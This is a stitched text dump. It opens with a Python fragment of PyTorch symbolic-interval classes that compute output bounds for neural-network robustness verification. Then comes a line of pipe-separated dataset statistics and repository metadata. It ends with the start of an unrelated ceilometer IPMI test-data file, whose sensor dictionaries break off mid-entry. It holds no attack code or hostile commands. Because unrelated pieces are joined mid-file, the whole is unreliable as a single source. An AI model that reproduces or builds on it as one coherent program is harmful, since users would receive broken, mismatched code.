        # Error dependencies added by overestimated ReLU nodes, plus the
        # index matrices mapping their rows back to batch samples.
        self.edep = []
        self.edep_ind = []

    '''Calculating the upper and lower matrix for symbolic intervals.
    To make concretize easier, convolutional layer nodes will be
    extended first.
    '''
    def concretize(self):
        self.extend()
        if self.norm=="linf":
            # Error = |input dependency| weighted by the per-input radius.
            e = (self.idep*self.e.view(self.batch_size, self.input_size, 1)).abs().sum(dim=1)
        elif self.norm == "l2":
            idep = torch.norm(self.idep, dim=1, keepdim=False)
            e = idep*self.epsilon
        elif self.norm == "l1":
            idep = self.idep.abs().max(dim=1, keepdim=False)[0]
            e = idep*self.epsilon
        # NOTE(review): an unrecognized `norm` leaves `e` unbound and
        # raises NameError below — confirm callers only pass
        # "linf" / "l2" / "l1".
        if self.edep:
            # Add the error contributed by each overestimated node.
            for i in range(len(self.edep)):
                e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
        self.l = self.c - e
        self.u = self.c + e
        return self

    '''Extending convolutional layer nodes to a two-dimensional vector.
    '''
    def extend(self):
        self.c = self.c.reshape(self.batch_size, self.n)
        self.idep = self.idep.reshape(-1, self.input_size, self.n)
        for i in range(len(self.edep)):
            self.edep[i] = self.edep[i].reshape(-1, self.n)

    '''Convert the extended layer back to the shape stored in `shape`.
    '''
    def shrink(self):
        self.c = self.c.reshape(tuple([-1]+self.shape))
        self.idep = self.idep.reshape(tuple([-1]+self.shape))
        for i in range(len(self.edep)):
            self.edep[i] = self.edep[i].reshape(tuple([-1]+self.shape))

    '''Calculate the worst case of the analyzed output ranges.
    Return the upper bound of other output dependency minus target's
    output dependency. If the returned value is less than 0, it means
    the worst case provided by interval analysis will never be larger
    than the target label y's.
    '''
    def worst_case(self, y, output_size):
        assert y.shape[0] == self.l.shape[0] == self.batch_size,\
                "wrong label shape"
        # One-hot mask selecting each sample's target label.
        # NOTE(review): uint8 masks for masked_select are deprecated in
        # newer PyTorch (bool expected) — confirm the pinned version.
        if(self.use_cuda):
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False, device=y.get_device())[y]
        else:
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False)[y]
        # Subtract the target column from centers and dependencies so the
        # resulting bounds are relative to the target label.
        c_t = self.c.masked_select(kk).unsqueeze(1)
        self.c = self.c - c_t
        idep_t = self.idep.masked_select(kk.view(self.batch_size,1,output_size)).view(self.batch_size, self.input_size,1)
        self.idep = self.idep-idep_t
        for i in range(len(self.edep)):
            edep_t = self.edep[i].masked_select((self.edep_ind[i].mm(kk.type_as(self.edep_ind[i]))).type_as(kk)).view(-1,1)
            self.edep[i] = self.edep[i]-edep_t
        self.concretize()
        return self.u
class mix_interval(Symbolic_interval):
    '''Symbolic interval that also tracks naive interval bounds.

    Keeps detached copies of the naive bounds (:attr:`nl`, :attr:`nu`,
    :attr:`nc`, :attr:`ne`) alongside the symbolic state and intersects
    the two bound sets when concretizing, keeping whichever is tighter.
    '''
    def __init__(self, lower, upper, epsilon=0, norm="linf", use_cuda=False):
        assert lower.shape[0]==upper.shape[0], "each symbolic"+\
            "should have the same shape"
        Symbolic_interval.__init__(self, lower, upper)
        self.use_cuda = use_cuda
        self.shape = list(self.c.shape[1:])
        self.n = list(self.c[0].reshape(-1).size())[0]
        self.input_size = self.n
        self.batch_size = self.c.shape[0]
        self.epsilon = epsilon
        self.norm = norm
        # Identity input-dependency matrix, shape (1, n, n).
        if(self.use_cuda):
            self.idep = torch.eye(self.n, device=self.c.get_device()).unsqueeze(0)
        else:
            self.idep = torch.eye(self.n).unsqueeze(0)
        self.edep = []
        self.edep_ind = []
        # Detached copies of the naive bounds; presumably updated by the
        # propagation code elsewhere in the library — confirm.
        self.nl = self.l.clone().detach()
        self.nu = self.u.clone().detach()
        self.nc = self.c.clone().detach()
        self.ne = self.e.clone().detach()

    '''Calculating the upper and lower matrix for symbolic intervals.
    To make concretize easier, convolutional layer nodes will be
    extended first.
    '''
    def concretize(self):
        self.extend()
        if self.norm=="linf":
            e = (self.idep*self.e.view(self.batch_size, self.input_size, 1)).abs().sum(dim=1)
        elif self.norm == "l2":
            idep = torch.norm(self.idep, dim=1, keepdim=False)
            e = idep*self.epsilon
        elif self.norm == "l1":
            idep = self.idep.abs().max(dim=1, keepdim=False)[0]
            e = idep*self.epsilon
        # NOTE(review): an unrecognized `norm` leaves `e` unbound —
        # confirm callers only pass "linf" / "l2" / "l1".
        if self.edep:
            for i in range(len(self.edep)):
                e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
        self.l = self.c - e
        self.u = self.c + e
        # Intersect with the naive bounds: elementwise max of lower
        # bounds and min of upper bounds, i.e. keep the tighter one.
        self.l = torch.where(self.l>self.nl, self.l, self.nl)
        self.u = torch.where(self.u<self.nu, self.u, self.nu)
        return self

    '''Extending convolutional layer nodes to a two-dimensional vector.
    '''
    def extend(self):
        self.c = self.c.reshape(self.batch_size, self.n)
        self.idep = self.idep.reshape(-1, self.input_size, self.n)
        for i in range(len(self.edep)):
            self.edep[i] = self.edep[i].reshape(-1, self.n)
        # The naive copies are flattened in lockstep.
        self.nc = self.nc.reshape(self.batch_size, self.n)
        self.ne = self.ne.reshape(self.batch_size, self.n)
        self.nl = self.nl.reshape(self.batch_size, self.n)
        self.nu = self.nu.reshape(self.batch_size, self.n)

    '''Convert the extended layer back to the shape stored in `shape`.
    '''
    def shrink(self):
        self.c = self.c.reshape(tuple([-1]+self.shape))
        self.idep = self.idep.reshape(tuple([-1]+self.shape))
        for i in range(len(self.edep)):
            self.edep[i] = self.edep[i].reshape(tuple([-1]+self.shape))
        self.nc = self.nc.reshape(tuple([-1]+self.shape))
        self.ne = self.ne.reshape(tuple([-1]+self.shape))
        self.nl = self.nl.reshape(tuple([-1]+self.shape))
        self.nu = self.nu.reshape(tuple([-1]+self.shape))

    '''Calculate the worst case of the analyzed output ranges.
    Return the upper bound of other output dependency minus target's
    output dependency. If the returned value is less than 0, it means
    the worst case provided by interval analysis will never be larger
    than the target label y's.
    '''
    def worst_case(self, y, output_size):
        assert y.shape[0] == self.l.shape[0] == self.batch_size,\
                "wrong label shape"
        # One-hot mask selecting each sample's target label.
        # NOTE(review): uint8 masks for masked_select are deprecated in
        # newer PyTorch (bool expected) — confirm the pinned version.
        if(self.use_cuda):
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False, device=y.get_device())[y]
        else:
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False)[y]
        c_t = self.c.masked_select(kk).unsqueeze(1)
        self.c = self.c - c_t
        idep_t = self.idep.masked_select(kk.view(self.batch_size,1,output_size)).view(self.batch_size, self.input_size,1)
        self.idep = self.idep-idep_t
        for i in range(len(self.edep)):
            edep_t = self.edep[i].masked_select((self.edep_ind[i].mm(kk.type_as(self.edep_ind[i]))).type_as(kk)).view(-1,1)
            self.edep[i] = self.edep[i]-edep_t
        self.concretize()
        return self.u
class Center_symbolic_interval(Interval):
    '''Symbolic interval keeping only input dependencies.

    Unlike :class:`Symbolic_interval` it carries no error dependencies
    for overestimated ReLU nodes — only the identity-seeded input
    dependency matrix :attr:`idep`.
    '''
    def __init__(self, lower, upper, use_cuda=False):
        assert lower.shape[0]==upper.shape[0], "each symbolic"+\
            "should have the same shape"
        Interval.__init__(self, lower, upper)
        self.use_cuda = use_cuda
        self.shape = list(self.c.shape[1:])
        self.n = list(self.c[0].reshape(-1).size())[0]
        self.input_size = self.n
        self.batch_size = self.c.shape[0]
        # Identity input-dependency matrix, shape (1, n, n).
        if(self.use_cuda):
            self.idep = torch.eye(self.n, device=self.c.get_device()).unsqueeze(0)
        else:
            self.idep = torch.eye(self.n).unsqueeze(0)

    '''Calculating the upper and lower matrix for symbolic intervals.
    To make concretize easier, convolutional layer nodes will be
    extended first.
    '''
    def concretize(self):
        self.extend()
        # Error = |input dependency| weighted by the per-input radius.
        e = (self.idep*self.e.view(self.batch_size, self.input_size, 1)).abs().sum(dim=1)
        self.l = self.c - e
        self.u = self.c + e
        return self

    '''Extending convolutional layer nodes to a two-dimensional vector.
    '''
    def extend(self):
        self.c = self.c.reshape(self.batch_size, self.n)
        self.idep = self.idep.reshape(-1, self.input_size, self.n)

    '''Convert the extended layer back to the shape stored in `shape`.
    '''
    def shrink(self):
        self.c = self.c.reshape(tuple([-1]+self.shape))
        self.idep = self.idep.reshape(tuple([-1]+self.shape))

    '''Calculate the worst case of the analyzed output ranges.
    Return the upper bound of other output dependency minus target's
    output dependency. If the returned value is less than 0, it means
    the worst case provided by interval analysis will never be larger
    than the target label y's.
    '''
    def worst_case(self, y, output_size):
        assert y.shape[0] == self.l.shape[0] == self.batch_size,\
                "wrong label shape"
        # One-hot mask selecting each sample's target label.
        # NOTE(review): uint8 masks for masked_select are deprecated in
        # newer PyTorch (bool expected) — confirm the pinned version.
        if(self.use_cuda):
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False, device=y.get_device())[y]
        else:
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False)[y]
        c_t = self.c.masked_select(kk).unsqueeze(1)
        self.c = self.c - c_t
        idep_t = self.idep.masked_select(kk.view(self.batch_size,1,output_size)).view(self.batch_size, self.input_size,1)
        self.idep = self.idep-idep_t
        self.concretize()
        return self.u
class Symbolic_interval_proj1(Interval):
    '''Symbolic interval keeping full dependencies for a subset of inputs.

    Only ``proj`` inputs keep full symbolic dependency rows; the rest
    are folded into a single concretized row (:attr:`idep_proj`).

    * :attr:`shape` is the input shape of ReLU layers.
    * :attr:`n` is the number of hidden nodes in each layer.
    * :attr:`idep` keeps the input dependencies.
    * :attr:`edep` keeps the error dependency introduced by each
      overestimated node.
    '''
    def __init__(self, lower, upper, proj=None, proj_ind=None, use_cuda=False):
        assert lower.shape[0]==upper.shape[0], "each symbolic"+\
            "should have the same shape"
        Interval.__init__(self, lower, upper)
        self.use_cuda = use_cuda
        self.shape = list(self.c.shape[1:])
        self.n = list(self.c[0].reshape(-1).size())[0]
        self.input_size = self.n
        self.batch_size = self.c.shape[0]
        # Identity dependency matrix (no batch axis yet).
        if(self.use_cuda):
            self.idep = torch.eye(self.n, device=self.c.get_device())
        else:
            self.idep = torch.eye(self.n)
        self.edep = []
        self.edep_ind = []
        self.proj_ind = proj_ind
        # Cap the projection size at the input size.
        # NOTE(review): `proj` defaults to None but is compared against
        # an int here; callers presumably always pass an int — confirm.
        if(proj>self.input_size):
            warnings.warn("proj is larger than input size")
            self.proj = self.input_size
        else:
            self.proj = proj
        if(proj_ind is None):
            # Default projection: keep full rows for the first `proj`
            # inputs; the remaining inputs are folded into one
            # concretized error row weighted by their radii.
            idep_ind = np.arange(self.proj)
            proj_ind = np.arange(self.proj, self.input_size)
            self.idep_proj = self.idep[proj_ind].sum(dim=0).unsqueeze(0)
            self.idep = self.idep[idep_ind].unsqueeze(0)
            self.idep_proj = self.idep_proj*self.e.view(self.batch_size, self.input_size)
            self.e = self.e.view(self.batch_size, self.input_size)[:, idep_ind]
        else:
            # Caller-specified projection indices (one set per sample):
            # fold the radius into idep, then gather the kept rows.
            self.idep = self.idep.unsqueeze(0)*self.e.view(self.batch_size,1,self.n)
            self.idep = self.idep.gather(index=proj_ind.unsqueeze(-1).repeat(1,1,self.n), dim=1)
            # Inputs not covered by any kept row are concretized.
            self.idep_proj = (self.idep.sum(dim=1)==0).type_as(self.idep)
            self.idep_proj = self.idep_proj*self.e.view(self.batch_size, self.input_size)

    '''Calculating the upper and lower matrix for symbolic intervals.
    To make concretize easier, convolutional layer nodes will be
    extended first.
    '''
    def concretize(self):
        self.extend()
        if(self.proj_ind is None):
            e = (self.idep*self.e.view(self.batch_size, self.proj, 1)).abs().sum(dim=1)
        else:
            # The radius was already folded into idep in __init__.
            e = self.idep.abs().sum(dim=1)
        # Add the concretized contribution of the non-projected inputs.
        e = e + self.idep_proj.abs()
        if(self.edep):
            for i in range(len(self.edep)):
                e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
        self.l = self.c - e
        self.u = self.c + e
        return self

    '''Extending convolutional layer nodes to a two-dimensional vector.
    '''
    def extend(self):
        self.c = self.c.reshape(self.batch_size, self.n)
        self.idep = self.idep.reshape(-1, self.proj, self.n)
        self.idep_proj = self.idep_proj.reshape(-1, self.n)
        for i in range(len(self.edep)):
            self.edep[i] = self.edep[i].reshape(-1, self.n)

    '''Convert the extended layer back to the shape stored in `shape`.
    '''
    def shrink(self):
        self.c = self.c.reshape(tuple([-1]+self.shape))
        self.idep = self.idep.reshape(tuple([-1]+self.shape))
        self.idep_proj = self.idep_proj.view(tuple([self.batch_size]+self.shape))
        for i in range(len(self.edep)):
            self.edep[i] = self.edep[i].reshape(tuple([-1]+self.shape))

    '''Calculate the worst case of the analyzed output ranges.
    Return the upper bound of other output dependency minus target's
    output dependency. If the returned value is less than 0, it means
    the worst case provided by interval analysis will never be larger
    than the target label y's.
    '''
    def worst_case(self, y, output_size):
        assert y.shape[0] == self.l.shape[0] == self.batch_size,\
                "wrong label shape"
        # One-hot mask selecting each sample's target label.
        # NOTE(review): uint8 masks for masked_select are deprecated in
        # newer PyTorch (bool expected) — confirm the pinned version.
        if(self.use_cuda):
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False, device=y.get_device())[y]
        else:
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False)[y]
        c_t = self.c.masked_select(kk).unsqueeze(1)
        self.c = self.c - c_t
        idep_t = self.idep.masked_select(kk.view(self.batch_size,1,output_size)).view(self.batch_size, self.proj,1)
        self.idep = self.idep-idep_t
        # Shift the concretized row by the target entry, then zero the
        # target column.
        idep_proj_t = self.idep_proj.masked_select(kk)
        self.idep_proj = self.idep_proj+idep_proj_t.view(-1,1)
        self.idep_proj = self.idep_proj*(1-kk).type_as(self.idep_proj)
        for i in range(len(self.edep)):
            edep_t = self.edep[i].masked_select((self.edep_ind[i].mm(kk.type_as(self.edep_ind[i]))).type_as(kk)).view(-1,1)
            self.edep[i] = self.edep[i]-edep_t
        self.concretize()
        return self.u
class Symbolic_interval_proj2(Interval):
    '''Projected symbolic interval with a dense error-dependency tensor.

    Like :class:`Symbolic_interval_proj1`, but :attr:`edep` is a single
    dense tensor (initialized to zeros) instead of a list of per-node
    rows with index matrices.

    * :attr:`shape` is the input shape of ReLU layers.
    * :attr:`n` is the number of hidden nodes in each layer.
    * :attr:`idep` keeps the input dependencies.
    * :attr:`edep` keeps the error dependency introduced by each
      overestimated node.
    '''
    def __init__(self, lower, upper, proj=None, proj_ind=None, use_cuda=False):
        assert lower.shape[0]==upper.shape[0], "each symbolic"+\
            "should have the same shape"
        Interval.__init__(self, lower, upper)
        self.use_cuda = use_cuda
        self.shape = list(self.c.shape[1:])
        self.n = list(self.c[0].reshape(-1).size())[0]
        self.input_size = self.n
        self.batch_size = self.c.shape[0]
        # Identity dependency matrix (no batch axis yet).
        if(self.use_cuda):
            self.idep = torch.eye(self.n, device=self.c.get_device())
        else:
            self.idep = torch.eye(self.n)
        # Dense error-dependency tensor, same shape as the radius.
        self.edep = self.e.new_zeros(self.e.shape)
        self.proj_ind = proj_ind
        # NOTE(review): unlike proj1, `proj` is stored unchecked here —
        # a None or oversized value surfaces later; confirm callers.
        self.proj = proj
        if(proj_ind is None):
            # Default projection: full rows for the first `proj` inputs,
            # remaining inputs folded into one concretized row.
            idep_ind = np.arange(self.proj)
            proj_ind = np.arange(self.proj, self.input_size)
            self.idep_proj = self.idep[proj_ind].sum(dim=0).unsqueeze(0)
            self.idep = self.idep[idep_ind].unsqueeze(0)
            self.idep_proj = self.idep_proj*self.e.view(self.batch_size, self.input_size)
            self.e = self.e.view(self.batch_size, self.input_size)[:, idep_ind]
        else:
            # Caller-specified projection indices (one set per sample).
            self.idep = self.idep.unsqueeze(0)*self.e.view(self.batch_size,1,self.n)
            self.idep = self.idep.gather(index=proj_ind.unsqueeze(-1).repeat(1,1,self.n), dim=1)
            # Inputs not covered by any kept row are concretized.
            self.idep_proj = (self.idep.sum(dim=1)==0).type_as(self.idep)
            self.idep_proj = self.idep_proj*self.e.view(self.batch_size, self.input_size)

    '''Calculating the upper and lower matrix for symbolic intervals.
    To make concretize easier, convolutional layer nodes will be
    extended first.
    '''
    def concretize(self):
        self.extend()
        if(self.proj_ind is None):
            e = (self.idep*self.e.view(self.batch_size, self.proj, 1)).abs().sum(dim=1)
        else:
            # The radius was already folded into idep in __init__.
            e = self.idep.abs().sum(dim=1)
        # Concretized non-projected inputs, then dense error deps.
        e = e + self.idep_proj.abs()
        e = e + self.edep.abs()
        self.l = self.c - e
        self.u = self.c + e
        return self

    '''Extending convolutional layer nodes to a two-dimensional vector.
    '''
    def extend(self):
        self.c = self.c.reshape(self.batch_size, self.n)
        self.idep = self.idep.reshape(-1, self.proj, self.n)
        self.idep_proj = self.idep_proj.reshape(-1, self.n)
        self.edep = self.edep.reshape(self.batch_size, self.n)

    '''Convert the extended layer back to the shape stored in `shape`.
    '''
    def shrink(self):
        self.c = self.c.reshape(tuple([-1]+self.shape))
        self.idep = self.idep.reshape(tuple([-1]+self.shape))
        self.idep_proj = self.idep_proj.view(tuple([self.batch_size]+self.shape))
        self.edep = self.edep.view(tuple([-1]+self.shape))

    '''Calculate the worst case of the analyzed output ranges.
    Return the upper bound of other output dependency minus target's
    output dependency. If the returned value is less than 0, it means
    the worst case provided by interval analysis will never be larger
    than the target label y's.
    '''
    def worst_case(self, y, output_size):
        assert y.shape[0] == self.l.shape[0] == self.batch_size,\
                "wrong label shape"
        # One-hot mask selecting each sample's target label.
        # NOTE(review): uint8 masks for masked_select are deprecated in
        # newer PyTorch (bool expected) — confirm the pinned version.
        if(self.use_cuda):
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False, device=y.get_device())[y]
        else:
            kk = torch.eye(output_size, dtype=torch.uint8, requires_grad=False)[y]
        c_t = self.c.masked_select(kk).unsqueeze(1)
        self.c = self.c - c_t
        idep_t = self.idep.masked_select(kk.view(self.batch_size,1,output_size)).view(self.batch_size, self.proj,1)
        self.idep = self.idep-idep_t
        # Shift by the target entry and zero the target column, for both
        # the concretized row and the dense error dependencies.
        idep_proj_t = self.idep_proj.masked_select(kk)
        self.idep_proj = self.idep_proj+idep_proj_t.view(-1,1)
        self.idep_proj = self.idep_proj*(1-kk).type_as(self.idep_proj)
        edep_t = self.edep.masked_select(kk)
        self.edep = self.edep+edep_t.view(-1,1)
        self.edep = self.edep*(1-kk).type_as(self.edep)
        self.concretize()
        return self.u
class gen_sym(Symbolic_interval):
    '''Symbolic interval over several (norm, epsilon) pairs at once.

    Concretization computes the error for each configured norm and
    keeps the elementwise maximum, yielding bounds valid for all of
    the perturbation sets simultaneously.
    '''
    # NOTE(review): mutable default arguments (list) are shared across
    # calls; they are only read here, so this appears benign — confirm.
    def __init__(self, lower, upper, epsilon=[0, 0, 0], norm=["linf", "l2", "l1"], use_cuda=False):
        Symbolic_interval.__init__(self, lower, upper, epsilon, norm, use_cuda)
        self.use_cuda = use_cuda
        self.shape = list(self.c.shape[1:])
        self.n = list(self.c[0].reshape(-1).size())[0]
        self.input_size = self.n
        self.batch_size = self.c.shape[0]
        self.epsilon = epsilon  # one epsilon per entry of `norm`
        self.norm = norm
        # Identity input-dependency matrix, shape (1, n, n).
        if(self.use_cuda):
            self.idep = torch.eye(self.n, device=self.c.get_device()).unsqueeze(0)
        else:
            self.idep = torch.eye(self.n).unsqueeze(0)
        self.edep = []
        self.edep_ind = []

    def concretize(self):
        '''Concretize using the elementwise max error over all norms.'''
        self.extend()
        e = None
        for i in range(len(self.norm)):
            if self.norm[i] == "linf":
                e0 = (self.idep*self.e.view(self.batch_size, self.input_size, 1)).abs().sum(dim=1)
            elif self.norm[i] == "l2":
                idep = torch.norm(self.idep, dim=1, keepdim=False)
                e0 = idep*self.epsilon[i]
            elif self.norm[i] == "l1":
                idep = self.idep.abs().max(dim=1, keepdim=False)[0]
                e0 = idep*self.epsilon[i]
            # NOTE(review): an unrecognized norm entry reuses the
            # previous iteration's e0 (or raises NameError on the first
            # iteration) — confirm norm entries are always valid.
            if e is None:
                e = e0
            else:
                # Keep the larger (more conservative) error per element.
                e = torch.where(e>e0, e, e0)
        if self.edep:
            for i in range(len(self.edep)):
                e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
        self.l = self.c - e
        self.u = self.c + e
        return self
| 29.728972
| 96
| 0.682175
| 4,222
| 25,448
| 4.020133
| 0.083373
| 0.057974
| 0.036764
| 0.036057
| 0.80958
| 0.786367
| 0.772757
| 0.764508
| 0.762564
| 0.744182
| 0
| 0.015563
| 0.171801
| 25,448
| 855
| 97
| 29.763743
| 0.789761
| 0.212001
| 0
| 0.83731
| 0
| 0
| 0.02801
| 0
| 0
| 0
| 0
| 0
| 0.030369
| 1
| 0.073753
| false
| 0
| 0.008677
| 0
| 0.130152
| 0.002169
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
583219fe7021da84b985f05e6b8fe475fa7375d0
| 30,181
|
py
|
Python
|
ceilometer/tests/unit/ipmi/notifications/ipmi_test_data.py
|
maestro-hybrid-cloud/ceilometer
|
939cb080a193e14af8ceb44df3b631f5c2f6bf6d
|
[
"Apache-2.0"
] | 1
|
2016-03-10T06:55:45.000Z
|
2016-03-10T06:55:45.000Z
|
ceilometer/tests/unit/ipmi/notifications/ipmi_test_data.py
|
maestro-hybrid-cloud/ceilometer
|
939cb080a193e14af8ceb44df3b631f5c2f6bf6d
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/unit/ipmi/notifications/ipmi_test_data.py
|
maestro-hybrid-cloud/ceilometer
|
939cb080a193e14af8ceb44df3b631f5c2f6bf6d
|
[
"Apache-2.0"
] | 3
|
2015-10-08T20:03:36.000Z
|
2020-02-05T10:45:50.000Z
|
#
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Sample data for test_ipmi.
This data is provided as a sample of the data expected from the ipmitool
driver in the Ironic project, which is the publisher of the notifications
being tested.
"""
TEMPERATURE_DATA = {
'DIMM GH VR Temp (0x3b)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '26 (+/- 0.500) degrees C',
'Entity ID': '20.6 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM GH VR Temp (0x3b)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'CPU1 VR Temp (0x36)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '32 (+/- 0.500) degrees C',
'Entity ID': '20.1 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'CPU1 VR Temp (0x36)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'DIMM EF VR Temp (0x3a)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '26 (+/- 0.500) degrees C',
'Entity ID': '20.5 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM EF VR Temp (0x3a)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'CPU2 VR Temp (0x37)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '31 (+/- 0.500) degrees C',
'Entity ID': '20.2 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'CPU2 VR Temp (0x37)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'Ambient Temp (0x32)': {
'Status': 'ok',
'Sensor Reading': '25 (+/- 0) degrees C',
'Entity ID': '12.1 (Front Panel Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Event Message Control': 'Per-threshold',
'Assertion Events': '',
'Upper non-critical': '43.000',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Upper non-recoverable': '50.000',
'Positive Hysteresis': '4.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '46.000',
'Sensor ID': 'Ambient Temp (0x32)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '25.000'
},
'Mezz Card Temp (0x35)': {
'Status': 'Disabled',
'Sensor Reading': 'Disabled',
'Entity ID': '44.1 (I/O Module)',
'Event Message Control': 'Per-threshold',
'Upper non-critical': '70.000',
'Upper non-recoverable': '85.000',
'Positive Hysteresis': '4.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'Mezz Card Temp (0x35)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '25.000'
},
'PCH Temp (0x3c)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '46 (+/- 0.500) degrees C',
'Entity ID': '45.1 (Processor/IO Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '93.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '103.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '98.000',
'Sensor ID': 'PCH Temp (0x3c)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'DIMM CD VR Temp (0x39)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '27 (+/- 0.500) degrees C',
'Entity ID': '20.4 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM CD VR Temp (0x39)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'PCI Riser 2 Temp (0x34)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '30 (+/- 0) degrees C',
'Entity ID': '16.2 (System Internal Expansion Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '70.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '85.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'PCI Riser 2 Temp (0x34)',
